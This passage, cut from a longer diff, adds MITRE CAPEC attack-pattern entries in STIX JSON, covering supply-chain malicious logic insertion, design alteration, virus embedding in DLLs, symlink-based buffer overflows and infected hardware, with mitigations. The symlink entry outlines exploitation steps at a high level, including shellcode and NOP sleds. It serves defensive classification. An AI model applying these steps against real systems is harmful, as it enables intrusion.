"reference_from_CAPEC", + "url": "https://www.forbes.com/sites/thomasbrewster/2015/02/19/superfish-need-to-know/?sh=991ab8c38776" + }, + { + "description": "Dan Goodin, Lenovo PCs ship with man-in-the-middle adware that breaks HTTPS connections, 2015--02---19, Ars Technica", + "external_id": "REF-708", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2015/02/lenovo-pcs-ship-with-man-in-the-middle-adware-that-breaks-https-connections/" + }, + { + "description": "Rob Graham, Extracting the SuperFish certificate, 2015--02---19, Errata Security", + "external_id": "REF-709", + "source_name": "reference_from_CAPEC", + "url": 
"https://blog.erratasec.com/2015/02/extracting-superfish-certificate.html#.VOX5Ky57RqE" + }, + { + "description": "Jordan Robertson, Michael Riley, The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies, 2018--10---04, Bloomberg", + "external_id": "REF-713", + "source_name": "reference_from_CAPEC", + "url": "https://www.bloomberg.com/news/features/2018-10-04/the-big-hack-how-china-used-a-tiny-chip-to-infiltrate-america-s-top-companies" + } + ], + "id": "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Logic Insertion into Product via Inclusion of Third-Party Component", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n From mid-2014 to early 2015, Lenovo computers were shipped with the Superfish Visual Search software that ultimately functioned as adware on the system. The Visual Search installation included a self-signed root HTTPS certificate that was able to intercept encrypted traffic for any site visited by the user. Of more concern was the fact that the certificate's corresponding private key was the same for every Lenovo machine. Once the private key was discovered [REF-709], an adversary could then conduct an Adversary-in-the-Middle (AitM) attack that would go undetected by machines that had this certificate installed on it. Adversaries could then masquerade as legitimate entities such as financial institutions, popular corporations, or other secure destinations on the Internet. [REF-708]\n ", + "\n In 2018 it was discovered that Chinese spies infiltrated several U.S. 
government agencies and corporations as far back as 2015 by including a malicious microchip within the motherboard of servers sold by Elemental Technologies to the victims. Although these servers were assembled via a U.S. based company, the motherboards used within the servers were manufactured and maliciously altered via a Chinese subcontractor. Elemental Technologies then sold these malicious servers to various U.S. government agencies, such as the DoD and CIA, and corporations like Amazon and Apple. The malicious microchip provided adversaries with a backdoor into the system, which further allowed them to access any network that contained the exploited systems, to exfiltrate data to be sent to the Chinese government.[REF-713]\n " + ], + "x_capec_extended_description": "\n The result is a window of opportunity for exploiting the product until the insecure component is discovered. This supply chain threat can result in the installation of malicious software or hardware that introduces widespread security vulnerabilities within an organization. Additionally, because software often depends upon a large number of interdependent libraries and components to be present, security holes can be introduced merely by installing Commercial off the Shelf (COTS) or Open Source Software (OSS) software that comes pre-packaged with the components required for it to operate. It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the product during the initial or continuous development. This access is often obtained via insider access to include the third-party component after deployment." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08eb707e-3b00-4b2a-8cf4-aeab56225d0b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8518d1b7-1b13-4b4b-af0f-f19b9c7f080a", + "target_ref": "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Don't assume popular third-party components are free from malware or vulnerabilities. For software, assess for malicious functionality via update/commit reviews or automated static/dynamic analysis prior to including the component within the application and deploying in a production environment.", + "id": "course-of-action--f85980bd-a209-4bd2-a8bd-8b3b5480f089", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-446-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7cf60c87-e9bd-44a0-97fd-cffc9e257e67", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f85980bd-a209-4bd2-a8bd-8b3b5480f089", + "target_ref": "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary modifies the design of a technology, product, or component to acheive a negative impact once the system is deployed. In this type of attack, the goal of the adversary is to modify the design of the system, prior to development starting, in such a way that the negative impact can be leveraged when the system is later deployed. Design alteration attacks differ from development alteration attacks in that design alteration attacks take place prior to development and which then may or may not be developed by the adverary. Design alteration attacks include modifying system designs to degrade system performance, cause unexpected states or errors, and general design changes that may lead to additional vulnerabilities. These attacks generally require insider access to modify design documents, but they may also be spoofed via web communications. The product is then developed and delivered to the user where the negative impact can be leveraged at a later time.", + "external_references": [ + { + "external_id": "CAPEC-447", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/447.html" + } + ], + "id": "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Design Alteration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Availability": [ + "Unreliable Execution" + ], + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + 
"attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e" + ], + "x_capec_prerequisites": [ + "Access to system design documentation prior to the development phase. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have.", + "Ability to forge web communications to deliver modified design documentation." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess design documentation prior to development to ensure that they function as intended and without any malicious functionality.", + "id": "course-of-action--e68b1c60-e63a-4c2f-bc78-1be3494a0031", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-447-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a78cd3b8-5b83-473a-a2b9-a4f2f8eb4a52", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e68b1c60-e63a-4c2f-bc78-1be3494a0031", + "target_ref": "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that design 
documentation is saved in a secure location and has proper access controls set in place to avoid unnecessary modification.", + "id": "course-of-action--a24db5bc-0875-48f1-b156-cd237ebeddad", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-447-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--54127afd-7b03-4cb6-b49b-ae02838e829c", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a24db5bc-0875-48f1-b156-cd237ebeddad", + "target_ref": "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary tampers with a DLL and embeds a computer virus into gaps between legitimate machine instructions. These gaps may be the result of compiler optimizations that pad memory blocks for performance gains. 
The embedded virus then attempts to infect any machine which interfaces with the product, and possibly steal private data or eavesdrop.", + "external_references": [ + { + "external_id": "CAPEC-448", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/448.html" + }, + { + "external_id": "CWE-506", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/506.html" + }, + { + "description": "Obfuscated Files or Information: Embedded Payloads", + "external_id": "T1027.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/009" + } + ], + "id": "attack-pattern--41a75729-839b-409f-88f6-1b0c0dc9286c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Embed Virus into DLL", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0abd6ec-3ef1-4bad-88ac-615c6674b4d5", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "target_ref": "attack-pattern--41a75729-839b-409f-88f6-1b0c0dc9286c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Malware Infection into Product Software. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-449", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/449.html" + } + ], + "id": "attack-pattern--3a127c86-c569-4de3-a328-1c1b45a9f986", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via USB Stick", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack leverages the use of symbolic links to cause buffer overflows. An adversary can try to create or manipulate a symbolic link file such that its contents result in out of bounds data. 
When the target software processes the symbolic link file, it could potentially overflow internal buffers with insufficient bounds checking.", + "external_references": [ + { + "external_id": "CAPEC-45", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/45.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow via Symbolic Links", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The EFTP server has a buffer overflow that can be exploited if an adversary uploads a .lnk (link) file that contains more than 1,744 bytes. This is a classic example of an indirect buffer overflow. First the adversary uploads some content (the link file) and then the adversary causes the client consuming the data to be exploited. In this example, the ls command is exploited to compromise the server software.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program that might load in certain files to memory.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

  2. Techniques
    The adversary creates or modifies a symbolic link pointing to those files which contain an excessive amount of data. If creating a symbolic link to one of those files causes different behavior in the application, then an injection vector has been identified.
  3. Craft overflow file content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

  4. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the specially crafted file content, the adversary creates a symbolic link from the identified resource to the malicious file, causing a targeted buffer overflow attack.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary can create symbolic link on the target host.", + "The target host does not perform correct boundary checking while consuming data from a resources." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pay attention to the fact that the resource you read from can be a replaced by a Symbolic link. You can do a Symlink check before reading the file and decide that this is not a legitimate way of accessing the resource.", + "id": "course-of-action--ae175d98-2ef9-4f9b-a6e5-bdcd283fca9d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ecde6069-c1c7-4e95-bfbf-8d888d1da15e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ae175d98-2ef9-4f9b-a6e5-bdcd283fca9d", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "Because Symlink can be modified by an adversary, make sure that the ones you read are located in protected directories.", + "id": "course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c08d081e-5bc2-4eeb-bef2-5280baed888e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pay attention to the resource pointed to by your symlink links (See attack pattern named \"Forced Symlink race\"), they can be replaced by malicious resources.", + "id": "course-of-action--768e67b2-6609-4e58-b9e6-e321bd213b74", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d781109-18f4-4057-a1b2-2d53e821b317", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--768e67b2-6609-4e58-b9e6-e321bd213b74", + "target_ref": 
"attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Always check the size of the input data before copying to a buffer.", + "id": "course-of-action--5c0f30c8-59bc-4ff2-91c7-ca8f4bd5d374", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7487759c-c682-45d9-b902-871361800f52", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c0f30c8-59bc-4ff2-91c7-ca8f4bd5d374", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9762e554-038f-4527-b000-3e8e0d78fe26", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6ce42f28-5f2d-4b83-8daf-869c4145268e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--71106318-5e06-4db7-b209-bbf30b0020fb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--84ae2ea4-df85-4853-b1f2-319992648876", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Embed Virus into DLL. 
Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-450", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/450.html" + } + ], + "id": "attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via USB U3 Autorun", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Malware Infection into Product Software. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-451", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/451.html" + } + ], + "id": "attack-pattern--64076ab3-d972-4688-b46b-76627923a8a0", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via Infected Peripheral Device", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts malicious logic into hardware, typically in the form of a computer virus or rootkit. This logic is often hidden from the user of the hardware and works behind the scenes to achieve negative impacts. 
This pattern of attack focuses on hardware already fielded and used in operation as opposed to hardware that is still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-452", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/452.html" + } + ], + "id": "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Infected Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4" + ], + "x_capec_prerequisites": [ + "Access to the hardware currently deployed at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-452 : Malicious Logic Insertion into Product Hardware. 
Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-453", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/453.html" + } + ], + "id": "attack-pattern--a2eaa5c4-8d21-414a-9d49-08667f4c6427", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Malicious Logic Insertion via Counterfeit Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-452 : Malicious Logic Insertion into Product Hardware. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-454", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/454.html" + } + ], + "id": "attack-pattern--c18bf62a-4419-4606-9dbe-03ab63873b60", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Modification of Existing Components with Counterfeit Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-457 : Malicious Logic Insertion into Product Hardware. 
Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-455", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/455.html" + } + ], + "id": "attack-pattern--55c6c2d2-1850-4263-97eb-e47c9b9a7a4b", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Malicious Logic Insertion via Inclusion of Counterfeit Hardware Components", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts malicious logic into memory enabling them to achieve a negative impact. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems that are still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-456", + "source_name": 